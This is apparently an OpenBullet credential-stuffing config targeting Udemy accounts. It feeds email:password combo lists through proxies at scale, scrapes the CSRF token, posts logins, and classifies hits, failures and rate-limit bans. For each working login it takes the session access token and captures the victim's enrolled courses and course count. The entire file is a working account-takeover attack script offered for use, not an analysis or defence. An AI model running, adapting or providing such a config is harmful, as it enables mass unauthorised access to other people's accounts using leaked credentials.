[SETTINGS]
{
  "Name": "Udemy",
  "SuggestedBots": 100,
  "LastModified": "2018-05-06T12:47:56.7983824+02:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.udemy.com/join/login-popup/?display_type=popup&next=https://www.udemy.com/&locale=en_US&ref=&xref=&response_type=json" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_CSRF PARSE "<SOURCE>" LR "csrfmiddlewaretoken' value='" "'" Recursive=FALSE -> VAR "CSRF" "" "" 
#LOGIN REQUEST POST "https://www.udemy.com/join/login-popup/?display_type=popup&next=https://www.udemy.com/&locale=en_US&ref=&xref=&response_type=json" AutoRedirect=TRUE 
  CONTENT "csrfmiddlewaretoken=<CSRF>&locale=en_US&email=<USER>&password=<PASS>&submit=Login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.udemy.com/join/login-popup/?display_type=popup&next=https://www.udemy.com/&locale=en_US&ref=&xref=&response_type=json" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Ban OR 
    KEY "You have exceeded the maximum number of requests per hour" 
  KEYCHAIN Success OR 
    KEY "{\"returnUrl\": \"https://www.udemy.com/\"}" 
  KEYCHAIN Failure OR 
    KEY "Enter a valid email address." 
    KEY "Please check your email and password." 
#PARSE_ACCESS_TOKEN PARSE "<COOKIES(access_token)>" LR "" "" Recursive=FALSE -> VAR "ACCTOKEN" "" "" 
#SEE_ENROLLED REQUEST GET "https://www.udemy.com/api-2.0/users/me/subscribed-courses?fields%5Bcourse%5D=@min,visible_instructors,image_480x270,favorite_time,archive_time,completion_ratio,last_accessed_time,enrollment_time,features,num_collections&fields%5Buser%5D=@min,job_title&ordering=-access_time,-enrolled&page=1&page_size=100" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.udemy.com/" 
  HEADER "X-Udemy-Authorization: Bearer <ACCTOKEN>" 
  HEADER "Authorization: Bearer <ACCTOKEN>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "{\"count\":" 
#CAPTURE_COUNT PARSE "<SOURCE>" LR "count\": " "," Recursive=FALSE -> CAP "Count" "" "" 
#CAPTURE_TITLES PARSE "<SOURCE>" LR "url\": \"/" "/learn" Recursive=TRUE -> CAP "Title" "" "" 
